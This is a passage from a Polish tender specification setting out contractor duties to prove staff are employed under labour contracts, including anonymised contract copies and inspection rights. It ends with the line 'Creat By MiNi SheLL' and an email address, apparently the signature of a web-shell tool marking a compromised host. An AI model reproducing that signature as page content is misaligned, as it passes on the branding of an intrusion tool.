krótszym niż 3 dni robocze, przedstawi poświadczone za zgodność z oryginałem kopie umów o pracę osób zatrudnionych, o których mowa powyżej lub oświadczenie Wykonawcy lub podwykonawcy o zatrudnieniu na podstawie stosunku pracy osób wykonujących czynności, których dotyczy wezwanie. Oświadczenie to powinno zawierać w szczególności:<br/>- dokładne określenie podmiotu składającego oświadczenie,<br/>- datę złożenia oświadczenia,<br/>- wskazanie, że objęte wezwaniem czynności wykonują osoby zatrudnione na podstawie stosunku pracy wraz ze wskazaniem liczby tych osób, rodzaju umowy o pracę i wymiaru etatu oraz podpis osoby uprawnionej do złożenia oświadczenia w imieniu wykonawcy lub podwykonawcy.<br/>Kopie umów powinny zostać zanonimizowane w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (tj. w szczególności bez adresów, Nr PESEL pracowników) Informacje takie jak: imię i nazwisko pracownika, data zawarcia umowy, rodzaj umowy o pracę i wymiar etatu powinny być możliwe do zidentyfikowania.<br/>Niezłożenie przez Wykonawcę w wyznaczonym terminie żądanych przez Zamawiającego dokumentów w celu potwierdzenia spełnienia przez Wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie stosunku pracy traktowane będzie, jako niespełnienie przez Wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie stosunku pracy osób wskazanych powyżej.<br/>Zamawiający wymaga, aby Wykonawca lub podwykonawca zatrudnił w/w osoby na okres od rozpoczęcia do końca upływu terminu realizacji zamówienia; w przypadku rozwiązania stosunku pracy przez pracownika lub przez pracodawcę przed zakończeniem tego okresu wykonawca zobowiązany jest do zatrudnienia na to miejsce innej osoby.<br/>W trakcie realizacji zamówienia Zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec Wykonawcy odnośnego spełniania przez Wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie stosunku pracy osób, o których mowa powyżej.<br/>Szczegóły dotyczące wymagań zatrudnienia na podstawie stosunku pracy zawarte zostały we wzorze umowy – załącznik nr 7 do SWZ.<br/>Zamawiający nie określa dodatkowych wymagań związanych z zatrudnieniem osób, o których mowa w art. 96 ust. 2 pkt 2 pzp..

Creat By MiNi SheLL
Email: jattceo@gmail.com